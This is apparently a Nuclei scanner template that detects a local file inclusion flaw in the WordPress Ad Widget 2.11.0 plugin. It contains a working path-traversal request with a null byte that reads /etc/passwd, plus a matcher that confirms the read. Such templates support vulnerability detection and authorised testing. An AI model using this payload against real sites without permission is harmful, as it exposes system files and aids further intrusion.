id: ad-widget-lfi

info:
  name: WordPress Ad Widget 2.11.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    WordPress Ad Widget 2.11.0 is vulnerable to local file inclusion. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
  reference:
    - https://cxsecurity.com/issue/WLB-2017100084
    - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
    - https://wpscan.com/vulnerability/caca21fe-56bf-4d4c-afc8-4a218e52f0a2
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,lfi,wp,adWidget,wpscan

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100a6e57567b938b024ef6ecb50f2d10b1e34d74980c2260ca01dc8f792b2b0b7f902203a17f4b62643d1387b94766910fe28a6e955a7e438f1335cd134bdf3151441d0:922c64590222798bb761d5b6d8e72950
